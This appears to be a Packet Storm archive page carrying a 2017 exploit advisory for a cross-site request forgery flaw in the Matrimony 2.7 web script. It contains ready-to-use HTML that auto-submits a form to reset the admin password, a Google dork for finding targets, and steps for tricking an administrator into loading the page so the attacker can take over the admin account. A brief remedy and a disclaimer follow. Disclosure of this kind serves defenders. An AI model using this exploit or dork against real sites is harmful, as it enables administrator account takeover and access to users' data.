exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Matrimony 2.7 Cross Site Request Forgery

Matrimony 2.7 Cross Site Request Forgery
Posted Aug 28, 2017
Authored by Ali BawazeEer

Matrimony version 2.7 suffers from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 816a06c7d7595ef71786ff4e62fb3f1dc153c5931fd480a80b7b0ff526b4b08f

Matrimony 2.7 Cross Site Request Forgery

Change Mirror Download


# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

<!--
# Exploit Title: Matrimony 2.7 ( Admin account takeover ) Cross site request forgery
# Exploit Author: Ali BawazeEer || https://sa.linkedin.com/in/alibawazeeer
# Dork: inurl:simplesearch_results.php
# Date: 28.08.2017
# Vendor Homepage: http://www.scubez.net/
# Software Demo Link: live.mscript.in [ administrator control panel been disabled after reporting the vulnerability ]
# Version: 2.7
# Category: Webapps
# Tested on: windows 7 / mozila firefox
#
#
-->

# ========================================================
#
#
# Matrimony 2.7 ( Admin account takeover ) Cross site request forgery
#
# Description : change password functionality in the admin panel does not check for current password and no CSRF token in place which allow
# an Attackers to be able to completely compromise the admin account by changing the password for the [ Admin ] account which is the default name
#
# exploitation code : -

<html>
<body>
<form name="csrf_form" action="http://vulnerablesite/admin/adminpass_submit.php" method="post">
<input name="txtp" id="txtp" type="hidden" value="12345">
<input name="txtcp" id="txtcp" type="hidden" value="12345">
<!-- <input name="Submit" value="Submit" type="submit"> -->
<script type="text/javascript">document.csrf_form.submit();</script>
</body>
</html>

# Steps to produce : -
# 1) host the above code in the cloud
# 2) trick the admin to visit the page
# 3) password will be changed to 12345
# 4) attacker can navigate to the admin panel http://localhost/script/admin/login.php
# 5) attacker should be able to login with new credentials as ( Admin ) since its the default account
#
#
#
# Risk : attackers are able to gain full access to the administrator panel after chaning the password for the admin
# and thus have total control over the web application, including content change,and change user's account download backup of the site access to user's data..
#
#
# Remedy : developer should implement a check for current password and use CSRF token for each request
#
#
#
# ========================================================
# [+] Disclaimer
#
# Permission is hereby granted for the redistribution of this advisory,
# provided that it is not altered except by reformatting it, and that due
# credit is given. Permission is explicitly given for insertion in
# vulnerability databases and similar, provided that due credit is given to
# the author. The author is not responsible for any misuse of the information contained
# herein and prohibits any malicious use of all security related information
# or exploits by the author or elsewhere.
#
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #





Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close